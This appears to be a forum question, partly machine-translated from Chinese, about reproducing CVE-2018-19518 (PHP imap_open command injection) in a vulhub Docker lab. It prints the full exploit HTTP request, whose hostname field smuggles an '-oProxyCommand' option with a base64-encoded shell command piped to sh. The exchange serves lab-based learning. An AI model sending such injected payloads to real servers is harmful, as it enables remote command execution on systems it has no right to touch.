我已从https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518下载了CVE-2018-19518气氛 但是我不知道如何攻击这个码头工人环境, 我使用burpsuite工具更改了头,但它没有目录/ tmp。
您能告诉我们如何更改标题以使其成功吗? 它是这样的代码
POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222
#what should i change?just my ip?